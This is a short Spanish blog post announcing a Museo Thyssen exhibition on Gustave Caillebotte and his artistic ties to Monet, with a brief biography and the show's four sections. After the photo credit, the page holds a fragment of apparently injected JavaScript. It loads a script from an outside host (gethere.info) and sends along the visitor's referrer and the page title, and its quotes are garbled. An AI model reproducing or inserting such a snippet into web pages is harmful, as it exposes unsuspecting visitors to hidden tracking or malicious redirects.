Caillebotte: un poco de ocio en el Thyssen

05/10/2016

[ C ] Gustave Caillebotte - Allée bordée d'arbres (1890)

Os presentamos a Gustave Caillebotte (1848-1894), artista francés que dedicó su vida a la pintura, al coleccionismo, y a la organización de exposiciones. Podríamos englobar su estilo dentro del realismo pictórico, aunque cabe puntualizar la gran influencia que varios de sus colegas impresionistasDegas, Monet, Renoir, Pisarro…- ejercieron sobre prácticamente toda su obra. Le apasionaba plasmar escenas cotidianas, familiares y domésticas, y el retrato siempre se le dio bien. Parece que en vida nunca llegó a recibir un merecido reconocimiento por su trayectoria profesional. Dicho reconocimiento llegó con el tiempo a título póstumo.

Ahora el Museo Thyssen presenta también a este gran artista francés con una exposición que estará abierta al público hasta el próximo 30 octubre. En ella veremos esa estela impresionista que os comentábamos. De hecho, toda la muestra gira en torno a la relación pictórica que mantuvo en muchas de sus obras con Claude Monet. Curiosamente la mayoría de estas obras eran estampas cuyo tema principal era el jardín. Así pues podremos disfrutar de un total de 64 obras cedidas por coleccionistas privados e importantes museos internacionales como el Brooklyn Museum de Nueva York o el Marmottan Monet de París. La organización de la muestra se divide en:

  1. El París de Haussmann, un universo mineral.
  2. Vacaciones en Yerres.
  3. El Sena y los viajes a Normandía.
  4. El Jardín de Petit Gennevilliers.

Foto | cea +s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

ARTÍCULOS RELACIONADOS
COMPARTE ESTE ARTÍCULO